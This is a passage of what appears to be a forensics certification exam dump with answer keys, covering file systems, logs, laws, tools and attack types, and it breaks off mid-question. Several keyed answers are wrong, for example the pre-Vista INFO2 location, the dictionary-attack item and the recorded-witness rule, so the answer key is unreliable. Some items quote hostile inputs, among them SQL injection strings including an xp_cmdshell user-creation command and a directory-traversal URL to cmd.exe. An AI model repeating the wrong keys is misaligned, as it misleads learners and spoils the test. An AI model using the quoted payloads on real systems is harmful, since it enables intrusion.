Which Federal Rule of Evidence speaks about the Hearsay exception where the availability of the declarant is immaterial and certain characteristics of the declarant such as present sense impression, excited utterance, and recorded recollection are also observed while giving their testimony?

A.
Rule 803
Correct Answer
B.
Rule 804
C.
Rule 801
D.
Rule 802
Question 429

What is the extension used by Windows OS for shortcut files present on the machine?

A.
.lnk
Correct Answer
B.
.dat
C.
.pdf
D.
.log
Question 430

An International Mobile Equipment Identifier (IMEI) is a 15-digit number that indicates the manufacturer, model type, and country of approval for GSM devices. The first eight digits of an IMEI number that provide information about the model and origin of the mobile device is also known as:

A.
Type Allocation Code (TAC)
Correct Answer
B.
Integrated Circuit Code (ICC)
C.
Manufacturer Identification Code (MIC)
D.
Device Origin Code (DOC)
Question 431

BMP (Bitmap) is a standard file format for computers running the Windows operating system. BMP images can range from black and white (1 bit per pixel) up to 24 bit color (16.7 million colors). Each bitmap file contains a header, the RGBQUAD array, information header, and image data. Which of the following element specifies the dimensions, compression type, and color format for the bitmap?

A.
Image data
B.
Information header
Correct Answer
C.
The RGBQUAD array
D.
Header
Question 432

Report writing is a crucial stage in the outcome of an investigation. Which information should not be included in the report section?

A.
Purpose of the report
B.
Speculation or opinion as to the cause of the incident
Correct Answer
C.
Incident summary
D.
Author of the report
Question 433

Which among the following web application threats is resulted when developers expose various internal implementation objects, such as files, directories, database records, or key-through references?

A.
Cross-Site scripting
B.
Insecure direct object references
Correct Answer
C.
Cross-site request forgery
D.
Remote file inclusion
Question 434

Which of the following Event Correlation Approach is an advanced correlation method that assumes and predicts what an attacker can do next after the attack by studying the statistics and probability and uses only two variables?

A.
Rule-Based Approach
B.
Vulnerability-Based Approach
C.
Bayesian Correlation
Correct Answer
D.
Route Correlation
Question 435

A clothing company has recently deployed a website on its latest product line to increase its conversion rate and base of customers. Andrew, the network administrator recently appointed by the company, has been assigned with the task of protecting the website from intrusion and vulnerabilities. Which of the following tool should Andrew consider deploying in this scenario?

A.
ModSecurity
Correct Answer
B.
Recuva
C.
CryptaPix
D.
Kon-Boot
Question 436

Which ISO Standard enables laboratories to demonstrate that they comply with quality assurance and provide valid results?

A.
ISO/IEC 17025
Correct Answer
B.
ISO/IEC 18025
C.
ISO/IEC 16025
D.
ISO/IEC 19025
Question 437

A forensic analyst has been tasked with investigating unusual network activity inside a retail company's network. Employees complain of not being able to access services, frequent rebooting, and anomalies in log files. The investigator requested log files from the IT administrator and after carefully reviewing them, he finds the following log entry: 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah” or 1=1 – 12:34:35 192.2.3.4 HEAD GET /login.asp?username=blah” or) 1=1 (-- 12:34:35 192.2.3.4 HEAD GET /login.asp?username+blah” or exec master..xp_cmdshell ‘net user test testpass-- What type of attack was performed on the companies' web application?

A.
Directory transversal
B.
SQL injection
Correct Answer
C.
Unvalidated input
D.
Log tampering
Question 438

Tony, an email marketing professional, is accused of enticing people to reveal their personal information such as banking credentials, credit card details, bank details, etc. via phishing emails. What type of investigation will apply to Tony’s case?

A.
Civil
B.
None of these
C.
Administrative
D.
Criminal
Correct Answer
Question 439

_____________ allows a forensic investigator to identify the missing links during investigation.

A.
Chain of custody
B.
Exhibit numbering
C.
Evidence preservation
D.
Evidence reconstruction
Correct Answer
Question 440

Self-Monitoring, Analysis, and Reporting Technology (SMART) is built into the hard drives to monitor and report system activity. Which of the following is included in the report generated by SMART?

A.
Power-off time
B.
All the states (running and discontinued) associated with the OS
C.
A log of high temperatures that the drive has reached
Correct Answer
D.
List of running processes
Question 441

Mark works for a government agency as a cyber-forensic investigator. He has been given the task of restoring data from a hard drive. The partition of the hard drive was deleted by a disgruntled employee in order to hide their nefarious actions. What tool should Mark use to restore the data?

A.
EFSDump
B.
R-Studio
Correct Answer
C.
Diskview
D.
Diskmon
Question 442

An investigator needs to perform data acquisition from a storage media without altering its contents to maintain the integrity of the content. The approach adopted by the investigator relies upon the capacity of enabling read-only access to the storage media. Which tool should the investigator integrate into his/her procedures to accomplish this task?

A.
Data duplication tool
B.
Backup tool
C.
Bitlocker
D.
Write blocker
Correct Answer
Question 443

A call detail record (CDR) provides metadata about calls made over a phone service. From the following data fields, which one is not contained in a CDR.

A.
A unique sequence number identifying the record
B.
The call duration
C.
Phone number receiving the call
D.
The language of the call
Correct Answer
Question 444

Which tool allows dumping the contents of process memory without stopping the process?

A.
psdump.exe
B.
pmdump.exe
Correct Answer
C.
processdump.exe
D.
pdump.exe
Question 445

Web browsers can store relevant information from user activities. Forensic investigators may retrieve files, lists, access history, cookies, among other digital footprints. Which tool can contribute to this task?

A.
MZCacheView
Correct Answer
B.
Google Chrome Recovery Utility
C.
Task Manager
D.
Most Recently Used (MRU) list
Question 446

In exceptional circumstances, where a person finds it necessary to access original data held on a computer or on storage media, that person must be competent to do so and be able to explain his/her actions and the impact of those actions on the evidence, in the court. Which ACPO principle states this?

A.
Principle 1
B.
Principle 2
Correct Answer
C.
Principle 4
D.
Principle 3
Question 447

Which of the following tools is used dump the memory of a running process, either immediately or when an error condition occurs?

A.
CacheInf
B.
Belkasoft Live RAM Capturer
Correct Answer
C.
FATKit
D.
Coreography
Question 448

POP3 is an internet protocol used to retrieve emails from a mail server. Through which port does an email client connect with a POP server?

A.
25
B.
110
Correct Answer
C.
993
D.
143
Question 451

Which of the following are small pieces of data sent from a website and stored on the user's computer by the user's web browser to track, validate, and maintain specific user information?

A.
Temporary Files
B.
Open files
C.
Cookies
Correct Answer
D.
Web Browser Cache
Question 452

Depending upon the jurisdictional areas, different laws apply to different incidents. Which of the following law is related to fraud and related activity in connection with computers?

A.
18 USC §1029
B.
18 USC §1030
Correct Answer
C.
18 USC §1361
D.
18 USC §1371
Question 453

Charles has accidentally deleted an important file while working on his Mac computer. He wants to recover the deleted file as it contains some of his crucial business secrets. Which of the following tool will help Charles?

A.
Xplico
B.
Colasoft's Capsa
C.
FileSalvage
Correct Answer
D.
DriveSpy
Question 454

Which of the following files stores information about a local Google Drive installation such as User email ID, Local Sync Root Path, and Client version installed?

A.
filecache.db
B.
config.db
C.
sigstore.db
D.
Sync_config.db
Correct Answer
Question 455

An expert witness is a __________________ who is normally appointed by a party to assist the formulation and preparation of a party's claim or defense.

A.
Expert in criminal investigation
B.
Subject matter specialist
Correct Answer
C.
Witness present at the crime scene
D.
Expert law graduate appointed by attorney
Question 456

Which among the following is an act passed by the U.S. Congress in 2002 to protect investors from the possibility of fraudulent accounting activities by corporations?

A.
FISMA
B.
HIPAA
C.
SOX
Correct Answer
D.
GLBA
Question 457

Billy, a computer forensics expert, has recovered a large number of DBX files during the forensic investigation of a laptop. Which of the following email clients can he use to analyze the DBX files?

A.
Microsoft Outlook
B.
Eudora
C.
Mozilla Thunderbird
D.
Microsoft Outlook Express
Correct Answer
Question 458

Identify the file system that uses $BitMap file to keep track of all used and unused clusters on a volume.

A.
NTFS
Correct Answer
B.
FAT
C.
EXT
D.
FAT32
Question 459

The Apache server saves diagnostic information and error messages that it encounters while processing requests. The default path of this file is usr/local/apache/logs/error.log in Linux. Identify the Apache error log from the following logs.

A.
http://victim.com/scripts/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../.% c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+C:\Winnt\system32\Logfiles\W3SVC1
B.
[Wed Oct 11 14:32:52 2000] [error] [client 127.0.0.1] client denied by server configuration:/export/home/live/ap/htdocs/test
Correct Answer
C.
127.0.0.1 - frank [10/Oct/2000:13:55:36 -0700]"GET /apache_pb.gif HTTP/1.0" 200 2326
D.
127.0.0.1 - - [10/Apr/2007:10:39:11 +0300] ] [error] "GET /apache_pb.gif HTTP/1.0" 200 2326
Question 460

Which part of Metasploit framework helps users to hide the data related to a previously deleted file or currently unused by the allocated file?

A.
Wafen FS
B.
RuneFS
C.
FragFS
D.
Slacker
Correct Answer
Question 461

Event correlation is the process of finding relevance between the events that produce a final result. What type of correlation will help an organization to correlate events across a set of servers, systems, router and network?

A.
Same-platform correlation
B.
Network-platform correlation
C.
Cross-platform correlation
Correct Answer
D.
Multiple-platform correlation
Question 462

What malware analysis operation can the investigator perform using the jv16 tool?

A.
Files and Folder Monitor
B.
Installation Monitor
C.
Network Traffic Monitoring/Analysis
D.
Registry Analysis/Monitoring
Correct Answer
Question 463

A Linux system is undergoing investigation. In which directory should the investigators look for its current state data if the system is in powered on state?

A.
/auth
B.
/proc
Correct Answer
C.
/var/log/debug
D.
/var/spool/cron/
Question 464

Derrick, a forensic specialist, was investigating an active computer that was executing various processes. Derrick wanted to check whether this system was used in an incident that occurred earlier. He started inspecting and gathering the contents of RAM, cache, and DLLs to identify incident signatures. Identify the data acquisition method employed by Derrick in the above scenario.

A.
Live data acquisition
Correct Answer
B.
Static data acquisition
C.
Dead data acquisition
D.
Non-volatile data acquisition
Question 465

What happens to the header of the file once it is deleted from the Windows OS file systems?

A.
The OS replaces the entire hex byte coding of the file.
B.
The OS replaces the second letter of a deleted file name with a hex byte code: Eh5
C.
The OS replaces the first letter of a deleted file name with a hex byte code: E5h
Correct Answer
D.
The hex byte coding of the file remains the same, but the file location differs
Question 466

Steve received a mail that seemed to have come from her bank. The mail has instructions for Steve to click on a link and provide information to avoid the suspension of her account. The link in the mail redirected her to a form asking for details such as name, phone number, date of birth, credit card number or PIN, CVV code, SNNs, and email address. On a closer look, Steve realized that the URL of the form in not the same as that of her bank's. Identify the type of external attack performed by the attacker in the above scenario?

A.
Tailgating
B.
Espionage
C.
Phishing
Correct Answer
D.
Brute-force
Question 467

Identify the location of Recycle Bin on a Windows 7 machine that uses NTFS file system to store and retrieve files on the hard disk.

A.
Drive:\RECYCLER
B.
Drive:\RECYCLED
C.
C:\RECYCLED
D.
Drive:\$Recycle.Bin
Correct Answer
Question 468

In a Filesystem Hierarchy Standard (FHS), which of the following directories contains the binary files required for working?

A.
/mnt
B.
/media
C.
/sbin
Correct Answer
D.
/proc
Question 469

James, a forensics specialist, was tasked with investigating a Windows XP machine that was used for malicious online activities. During the investigation, he recovered certain deleted files from Recycle Bin to identify attack clues. Identify the location of Recycle Bin in Windows XP system.

A.
Drive:\$Recycle.Bin\
B.
Local/share/Trash
C.
Drive:\RECYCLER\
Correct Answer
D.
Drive:\RECYCLED
Question 472

Which code does the FAT file system use to mark the file as deleted?

A.
ESH
B.
H5E
C.
E5H
Correct Answer
D.
5EH
Question 473

What is the investigator trying to view by issuing the command displayed in the following screenshot?

A.
List of services stopped
B.
List of services closed recently
C.
List of services recently started
D.
List of services installed
Correct Answer
Question 474

While analyzing a hard disk, the investigator finds that the file system does not use UEFI-based interface. Which of the following operating systems is present on the hard disk?

A.
Windows 8
B.
Windows 7
Correct Answer
C.
Windows 8.1
D.
Windows 10
Question 475

Which of the following tools can be used to parse the contents of .lnk files to reveal information embedded within the files?

A.
Windows File Analyzer
Correct Answer
B.
ProDiscover
C.
Exiv2
D.
InfraView
Question 476

Which of the following is found within the unique instance ID key and helps investigators to map the entry from USBSTOR key to the MountedDevices key?

A.
ParentIDPrefix
Correct Answer
B.
LastWrite
C.
UserAssist key
D.
MRUListEx key
Question 477

Which event correlation approach is used to monitor the computer’s and computer users’ behavior to provide an alert if something anomalous is found?

A.
Automated Field Correlation
B.
Field-Based Approach
C.
Role-Based Approach
Correct Answer
D.
Vulnerability-Based Approach
Question 478

Which of the following examinations refers to the process of the witness being questioned by the attorney who called the letter to the stand?

A.
Witness Examination
Correct Answer
B.
Direct Examination
C.
Cross Examination
D.
Indirect Examination
Question 479

Which of the following SQL query can a forensic investigator use to retrieve the active Transaction Log files for a specific database?

A.
DBCC LOG
B.
DBCC DBINFO
C.
DBCC DATABLE
D.
DBCC DBLOG
Correct Answer
Question 480

In which attack does an attacker place a virtual machine (VM) in proximity to target cloud server, and take advantage of shared physical resources (processor cache) to extract cryptographic keys/plain text secrets to steal the victim’s credentials?

A.
Cloud Hijacking Attack
B.
Spoofing Attack
C.
Wrapping Attack
D.
Side channel Attacks
Correct Answer
Question 481

Tasklist command displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer. Which of the following tasklist commands provides information about the listed processes, including the image name, PID, name, and number of the session for the process?

A.
tasklist /p
B.
tasklist /v
Correct Answer
C.
tasklist /u
D.
tasklist /s
Question 482

Which of the following examinations refers to the process of providing the opposing side in a trial the opportunity to question a witness?

A.
Indirect Examination
B.
Cross Examination
Correct Answer
C.
Witness Examination
D.
Direct Examination
Question 483

On a Linux system, what is the command "dcfldd if=/dev/sda of=usbimg.dat” used for?

A.
To acquire an entire media device in one dat file
Correct Answer
B.
To acquire an entire media device in one image file
C.
To make an ISO image of a CD
D.
To generate segmented volumes of equal size
Question 484

NTFS sets a flag for the file once you encrypt it and creates an EFS attribute where it stores Data Decryption Field (DDF) and Data Recovery Field (DDR). Which of the following is not a part of DDF?

A.
Encrypted FEK
B.
Checksum
Correct Answer
C.
EFS Certificate Hash
D.
Container Name
Question 485

NTFS has reduced slack space than FAT, thus having lesser potential to hide data in the slack space. This is because:

A.
FAT does not index files
B.
NTFS is a journaling file system
C.
NTFS has lower cluster size space
Correct Answer
D.
FAT is an older and inefficient file system
Question 486

What is the framework used for application development for iOS-based mobile devices?

A.
Cocoa Touch
Correct Answer
B.
Dalvik
C.
Zygote
D.
AirPlay
Question 487

Which of the following application password cracking tool can discover all password-protected items on a computer and decrypts them?

A.
TestDisk for Windows
B.
R-Studio
C.
Windows Password Recovery Bootdisk
D.
Passware Kit Forensic
Correct Answer
Question 488

By examining which registry location in the Gilchrist’s system did Robert prove that the hacker has been connected to the XYZ wireless network?

A.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\NetworkList\Profiles
Correct Answer
B.
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs
C.
HKEY_CURRENT_MACHINE\System\Services\CurrentControlSet\services\Tcpip\Parameters\Interfaces
D.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Question 489

Shane has started the static analysis of a malware and is using the tool ResourcesExtract to find more details of the malicious program. What part of the analysis is he performing?

A.
Identifying File Dependencies
B.
Strings search
Correct Answer
C.
Dynamic analysis
D.
File obfuscation
Question 490

The Run rd /s /q C:\$Recycle.bin command is executed on a Windows machine to.

A.
Disable the Recycle Bin
B.
Repair the Recycle Bin
C.
Empty the Recycle Bin
Correct Answer
D.
Restore the files deleted from the Recycle Bin
Question 491

Shane a forensic specialist, is investigating an ongoing attack on a MySQL database server hosted on a Windows machine with SID "WIN-ABCDE12345F." What log will help Shane in tracking all the client connections and activities performed on database server?

A.
WIN-ABCDoE12345F-bin.n
B.
WIN-ABCDE12345F.log
Correct Answer
C.
WIN-ABCDE12345F.err
D.
WIN-ABCDE12345F.pid
Question 492

What must an attorney do first before you are called to testify as an expert?

A.
Qualify you as an expert witness.
Correct Answer
B.
Read your curriculum vitae to the jury.
C.
Engage in damage control.
D.
Prove that the tools you used to conduct your examination are perfect.
Question 493

Raw data acquisition format creates ____________of a data set or suspect drive.

A.
Simple sequential flat files.
Correct Answer
B.
Segmented files.
C.
Compressed image files.
D.
Segmented image files.
Question 494

Which of the following is a part of a Solid-State Drive (SSD)?

A.
NAND-based flash memory
Correct Answer
B.
Head
C.
Spindle
D.
Cylinder
Question 495

Which of the following files gives information about the client sync sessions in Google Drive on Windows?

A.
sync_log.log
B.
Sync_log.log
Correct Answer
C.
sync.log
D.
Sync.log
Question 496

Which of the following will create lost clusters?

A.
Logical structure error
Correct Answer
B.
Physical structure error
C.
Physical disk error
D.
Logical disk error
Question 497

Dan, a hacker, built an attractive website that has buttons and images containing text on each of them saying 'Click here to win an iPhone, Facebook a free trip to New York', and so on. Over these buttons, Dan loads an iframe in such a way that when a user clicks on any of those buttons or images, malware will be downloaded in their systems. What type of attack is Dan attempting in this scenario?

A.
Clickjacking
Correct Answer
B.
IRCs
C.
Likejacking
D.
Spearphishing
Question 498

Which of the following is a precomputed table containing word lists like dictionary files and brute force lists and their hash values?

A.
Directory Table
B.
Rainbow Table
Correct Answer
C.
Master file Table (MFT)
D.
Partition Table
Question 499

Which of the following does not describe the type of data density on a hard disk?

A.
Volume density
Correct Answer
B.
Track density
C.
Linear or recording density
D.
Areal density
Question 500

During forensics investigations, investigators tend to collect the system time at first and compare it with UTC. What does the abbreviation UTC stand for?

A.
Correlated Universal Time
B.
Universal Time for Computers
C.
Coordinated Universal Time
Correct Answer
D.
Universal Computer Time
Question 501

Adam, a forensic analyst, is preparing VMs for analyzing malware. Which of the following is NOT a best practice?

A.
Installing malware analysis tools
B.
Using network simulation tools
C.
Isolating the host device
D.
Enabling shared folders
Correct Answer
Question 502

What is the role of Alloc.c in Apache core?

A.
It handles allocation of resource pools
Correct Answer
B.
It is useful for reading and handling of the configuration files
C.
It takes care of all the data exchange and socket connections between the client and the server
D.
It handles server start-ups and timeouts
Question 503

In which of the following attackers does an attacker duplicate the body of the SOAP message and send it to the server impersonating a legitimate user, thereby accessing the cloud resources as the legitimate user?

A.
Meltdown Attack
B.
Cloud Squatting
C.
Side Channel Attack
D.
Wrapping Attack
Correct Answer
Question 504

You are asked to perform forensics on a MAC operating system. What kind of information would you obtain when you issue the stat command, followed by its supporting switches in the MAC terminal?

A.
Timestamp information of the selected file
Correct Answer
B.
Processes running on the system
C.
System version information
D.
Statistics of the present working directory
Question 505

Which of the following reports are delivered under oath to a board of directors/managers/panel of the jury?

A.
Verbal Formal Report
Correct Answer
B.
Written Formal Report
C.
Written Informal Report
D.
Verbal Informal Report
Question 506

Which Federal rule of evidence states that a duplicate is admissible to the same extent as an original unless (1) a genuine question is raised as to the authenticity of the original or (2) in the circumstances it would be unfair to admit the duplicate in lieu of the original?

A.
Rule 804
B.
Rule 1003
Correct Answer
C.
Rule 1000
D.
Rule 1004
Question 507

Which of the following email headers specifies an address for mailer-generated errors, like 'no such user' bounce messages, to go to (instead of the sender's address)?

A.
Mime-Version header
B.
Content-Type header
C.
Content-Transfer-Encoding header
D.
Errors-To header
Correct Answer
Question 508

Identify the RAID level represented below:

A.
RAID 3
B.
RAID 5
Correct Answer
C.
RAID 2
D.
RAID 0
Question 509

Which of the following attack uses HTML tag like <script></script>?

A.
Phishing
B.
Spam
C.
XSS attack
Correct Answer
D.
SQL injection
Question 510

Select the tool appropriate for examining the dynamically linked libraries of an application or malware.

A.
DependencyWalker
Correct Answer
B.
ResourcesExtract
C.
SysAnalyzer
D.
PEiD
Question 511

Which of the following functions of a log management system involves calculation of the message digest for each file and storing the message digest securely to ensure detection of the changes made to the archived logs?

A.
Log comparison
B.
Log file integrity checking
Correct Answer
C.
Log normalization
D.
Log parsing
Question 512

After suspecting a change in MS-Exchange Server storage archive, the investigator has analyzed it. Which of the following components is not an actual part of the archive?

A.
PUB.STM
Correct Answer
B.
PRIV.EDB
C.
PRIV.STM
D.
PUB.EDB
Question 513

What is the default IIS log location?

A.
%SystemDrive%\inetpub\logs\LogFiles
Correct Answer
B.
SystemDrive\inetpub\LogFiles
C.
SystemDrive\logs\LogFiles
D.
%SystemDrive%\logs\LogFiles
Question 514

Which file system developed by Apple, Inc., uses Unicode to name the files and folders within the system?

A.
Extended File System (EXT2)
B.
Hierarchical File System (FHS)
C.
File Allocation Table (FAT)
D.
Hierarchical File System Plus (HFS+)
Correct Answer
Question 515

In a centralized logging mechanism, what is the purpose of a local SEM server?

A.
The local SEM server processes all the event and forwards/deletes unnecessary events
B.
The local SEM simply forwards all the logs to the master SEM
C.
The local SEM server collects, processes, and queues all the events and forwards further tasks to the master SEM server
Correct Answer
D.
The local SEM server executes the subsequent functions of processing and storing the security events for analysis, reporting and display
Question 516

What is the investigator trying to analyze if the system gives the following image as output?

A.
All the logon sessions
B.
Currently active logon sessions
Correct Answer
C.
Inactive logon sessions
D.
Details of users who can logon
Question 517

Which of the following is a federal law enacted in the US to control the ways that financial institutions deal with the private information of individuals?

A.
GLBA
Correct Answer
B.
PCI DSS
C.
HIPPA 1996
D.
SOX
Question 518

Which of the following is the record of the characteristics of a file system, including its size, the block size, the empty and the filled blocks and their respective counts, the size and location of the inode tables, the disk block map and usage information, and the size of the block groups?

A.
Inode bitmap block
B.
Block bitmap block
C.
Data block
D.
Superblock
Correct Answer
Question 519

What system details can an investigator obtain from the NetBIOS name table cache?

A.
List of files shared between the connected systems
B.
List of connections made to other systems
Correct Answer
C.
List of files opened on other systems
D.
List of the system present on a router
Question 520

Steve, a system engineer in an organization, is facing allegations of uploading child pornography videos from his office computer. What type of investigation should be carried against him?

A.
Criminal investigation
B.
Both Criminal and Administrative Investigation
C.
Civil Investigation
D.
Administrative Investigation
Correct Answer
Question 521

Joshua is analyzing an MSSQL database for finding the attack evidence and other details, where should he look for the database logs?

A.
Model.log
B.
Model.txt
C.
Model.ldf
Correct Answer
D.
Model.lgf
Question 522

Which among the following search warrants allows the first responder to get the victim's computer information such as service records, billing records, and subscriber information from the service provider?

A.
Citizen Information Search Warrant
B.
Electronic Storage Device Search Warrant
C.
Service Provider Search Warrant
Correct Answer
D.
John Doe Search Warrant
Question 523

Which among the following is an OLE compound file saved in Binary Interchange File Format (BIFF)?

A.
PNG
B.
GIF
C.
XLS
Correct Answer
D.
PDF
Question 524

Robert was arrested under child pornography case for uploading child pornography videos to a website. FBI seized all the digital devices pertaining to the case and a forensic investigator was hired to carry out the investigation. The investigator suspected that the perpetrator might have performed the task online through the web browser. He also found that the suspect’s web browser history was cleared, which drew a better insight into the case. To recover the deleted browser artifacts and the Internet history from the web browser, which of the following tools is used by the forensic investigator?

A.
MultiMon
B.
LogMeister
Correct Answer
C.
Proc Heal Viewer
D.
HstEx
Question 525

Which network attack is described by the following statement? 'At least five Russian major banks came under a continuous hacker attack, although online client services were not disrupted. The attack came from a wide-scale botnet involving at least 24,000 computers, located in 30 countries.'

A.
Man-in-the-Middle Attack
B.
Sniffer Attack
C.
Buffer Overflow
D.
DDoS
Correct Answer
Question 526

Jason discovered a file named $RIYG6VR.doc in the C:\$Recycle.Bin\<USER SID>\ while analyzing a hard disk image for the deleted data. What inferences can he make from the file name?

A.
It is a doc file deleted in seventh sequential order
B.
RIYG6VR.doc is the name of the doc file deleted from the system
C.
It is file deleted from R drive
D.
It is a deleted doc file
Correct Answer
Question 527

The surface of a hard disk consists of several concentric rings known as tracks; each of these tracks has smaller partitions called disk blocks. What is the size of each block?

A.
512 bits
B.
512 bytes
Correct Answer
C.
256 bits
D.
256 bytes
Question 528

An insider in an organization deleted all the files containing sensitive information from his Windows 7 machine on the last day of his work at the organization. These deleted files would be stored in the Recycle Bin. But, to make them untraceable, he even deleted the INFO2 file from its location, which means that no files would appear in the Recycle Bin. Now, as a forensic expert, what would you do to get the deleted files back to the Recycle Bin?

A.
Type attrib -s -h recycler command in the command prompt
Correct Answer
B.
Type attrib -h info* command in the command prompt
C.
Restart the Windows machine
D.
Download the file from Microsoft website
Question 529

In which registry does the system store the Microsoft security IDs?

A.
HKEY_CLASSES_ROOT (HKCR)
B.
HKEY_CURRENT_CONFIG (HKCC)
C.
HKEY_CURRENT_USER (HKCU)
D.
HKEY_LOCAL_MACHINE (HKLM)
Correct Answer
Question 530

What is the primary function of the tool CHKDSK in Windows that authenticates the file system reliability of a volume?

A.
Repairs logical file system errors
Correct Answer
B.
Check the disk for hardware errors
C.
Check the disk for connectivity errors
D.
Check the disk for Slack Space
Question 531

A forensic examiner is examining a Windows system seized from a crime scene. During the examination of a suspect file, he discovered that the file is password protected. He tried guessing the password using the suspect's available information but without any success. Which of the following tool can help the investigator to solve this issue?

A.
Cain & Abel
Correct Answer
B.
Xplico
C.
Colasoft’s Capsa
D.
Recuva
Question 532

Which file is a sequence of bytes organized into blocks understandable by the system's linker?

A.
executable file
B.
source file
C.
Object file
Correct Answer
D.
None of these
Question 533

As a part of the investigation, Caroline, a forensic expert, was assigned the task to examine the transaction logs pertaining to a database named Transfers. She used SQL Server Management Studio to collect the active transaction log files of the database. Caroline wants to extract detailed information on the logs, including AllocUnitId, page id, slot id, etc. Which of the following commands does she need to execute in order to extract the desired information?

A.
DBCC LOG(Transfers, 1)
B.
DBCC LOG(Transfers, 3)
C.
DBCC LOG(Transfers, 0)
D.
DBCC LOG(Transfers, 2)
Correct Answer
Question 534

During the trial, an investigator observes that one of the principal witnesses is severely ill and cannot be present for the hearing. He decides to record the evidence and present it to the court. Under which rule should he present such evidence?

A.
Rule 1003: Admissibility of Duplicates
Correct Answer
B.
Limited admissibility
C.
Locard's Principle
D.
Hearsay
Question 535

Which among the following U.S. laws requires financial institutions companies that offer consumers financial products or services such as loans, financial or investment advice, or insurance to protect their customers information against security threats?

A.
FISMA
B.
HIPPA
C.
SOX
D.
GLBA
Correct Answer
Question 536

Which command line tools is used to determine active network connections?

A.
Netstat
Correct Answer
B.
nbstat
C.
nslookup
D.
netsh
Question 537

Which of the following tool can the investigator use to analyze the network to detect Trojan activities?

A.
Regshot
B.
TRIPWIRE
C.
RAM Computer
D.
Capsa
Correct Answer
Question 538

Which of the following processes is part of the dynamic malware analysis?

A.
Searching for the strings
B.
Malware disassembly
C.
File fingerprinting
D.
Process Monitoring
Correct Answer
Question 539

Which of the following is NOT a physical evidence?

A.
Cables
B.
Image file on a hard disk
Correct Answer
C.
Removable media
D.
Publications
Question 540

Which password cracking technique uses details such as length of password, character sets used to construct the password, etc.?

A.
Dictionary attack
Correct Answer
B.
Brute force attack
C.
Rule-based attack
D.
Man in the middle attack
Question 541

Which of the following tool can reverse machine code to assembly language?

A.
PEiD
B.
Deep Log Analyzer
C.
IDA Pro
Correct Answer
D.
RAM Capturer
Question 542

Which of the following techniques can be used to beat steganography?

A.
Encryption
B.
Decryption
C.
Steganalysis
Correct Answer
D.
Cryptanalysis
Question 543

Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where `x` represents the ___________________.

A.
Sequential number
B.
Original file name’s extension
C.
Original file name
D.
Drive name
Correct Answer
Question 544

Select the data that a virtual memory would store in a Windows-based system.

A.
Running processes
Correct Answer
B.
Documents and other files
C.
Application data
D.
Information or metadata of the files
Question 545

Investigators can use the Type Allocation Code (TAC) to find the model and origin of a mobile device. Where is TAC located in mobile devices?

A.
International Mobile Equipment Identifier (IMEI)
Correct Answer
B.
Integrated circuit card identifier (ICCID)
C.
International mobile subscriber identity (IMSI)
D.
Equipment Identity Register (EIR)
Question 546

Which of the following Data files store log-related information that could be useful in recovering databases?

A.
Virtual Log Files
B.
Transaction Log Data Files (LDF)
Correct Answer
C.
Secondary Log Files (NLF)
D.
Primary Log Files (MLF)
Question 547

iPhone OS stack consists of four abstraction layers. Which layer among these provides frameworks for iPhone app development?

A.
Media Services
B.
Cocoa Touch
Correct Answer
C.
Core OS
D.
Core Services
Question 548

Analyze the hex representation of mysql-bin.000013 file in the screenshot below. What do you infer from the hex data?

A.
A user with username bad_guy has logged into the WordPress web application
B.
An attacker with name anonymous_hacker has replaced a user bad_guy in the WordPress database
C.
A WordPress user has been created with the username anonymous_attacker
D.
A WordPress user has been created with the username bad_guy
Correct Answer
Question 549

A US-based organization decided to implement a RAID storage technology for their data backup plan. John wants to setup a RAID level that requires a minimum of six drives but will meet high fault tolerance and with a high speed for the data read and write operations. What RAID level will John need to choose to meet this requirement?

A.
RAID level 50
Correct Answer
B.
RAID level 1
C.
RAID level 10
D.
RAID level 5
Question 550

What does the bytes 0x0B-0x53 represent in the boot sector of NTFS volume on Windows 2000?

A.
Jump instruction and the OEM ID
B.
BIOS Parameter Block (BPB) and the OEM ID
C.
BIOS Parameter Block (BPB) and the extended BPB
Correct Answer
D.
Bootstrap code and the end of the sector marker
Question 551

What is the location of master database file INFO2 containing information about the deleted files in Windows systems prior to Windows Vista?

A.
C:\Recycle\
B.
C:\Recycler\
C.
C:\Recycled\
D.
C:\$Recycle.Bin\
Correct Answer
Question 552

Which of the following tools will help you to recover deleted files in Mac OS X?

A.
Time Machine
Correct Answer
B.
Spotlight
C.
Automator
D.
Grapher
Question 553

What is the purpose of command “dd if=mbr.backup of=/dev/xxx bs=512 count=1” on a Unix/Linux system?

A.
Back-up BIOS
B.
Restore the MBR
Correct Answer
C.
Restore BIOS
D.
Back-up MBR
Question 554

Common Apache log format is %h%I%u%t\”%>s%b. What does %b represent in the log format?

A.
The status code that the server sends back to the client
B.
The client’s IP address
C.
The size of the object that server sends to the client
Correct Answer
D.
The remote log name
Question 555

Buffer overflow vulnerability of a web application occurs when it fails to guard its buffer properly and allows writing beyond its maximum size. Thus, it overwrites the_________. There are multiple forms of buffer overflow, including a Heap Buffer Overflow and a Format String Attack.

A.
Adjacent memory locations
Correct Answer
B.
Adjacent bit blocks
C.
Adjacent buffer locations
D.
Adjacent string locations
Question 556

Which program uses different techniques to conceal a malware's code, thereby making it difficult for security mechanisms to detect or remove it?

A.
Dropper
B.
Packer
C.
Injector
D.
Obfuscator
Correct Answer
Question 557

Brian needs to acquire data from RAID storage. Which of the following acquisition methods is recommended to retrieve only the data relevant to the investigation?

A.
Static Acquisition
B.
Sparse or Logical Acquisition
Correct Answer
C.
Bit-stream disk-to-disk Acquisition
D.
Bit-by-bit Acquisition
Question 558

Attackers exploit web applications using techniques, such as SQL injection. To avoid getting detected by the application firewall and IDS/IPS systems, attackers use various obfuscation techniques to bypass the security mechanisms. One such technique has been implemented in the URL given below. What is the technique implemented? https://www.websitename.com/accounts.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

A.
Replaced Keywords
B.
Char Encoding
C.
Toggle Case
Correct Answer
D.
Hex Encoding
Question 559

Which command line tool is used to detect network interfaces that are running in promiscuous mode?

A.
NET SESSIONS
B.
Promdetect
C.
Promqry
Correct Answer
D.
Promquery
Question 560

Which of the following is a list of recently used programs or opened files?

A.
GUID Partition Table (GPT)
B.
Recently Used Programs (RUP)
C.
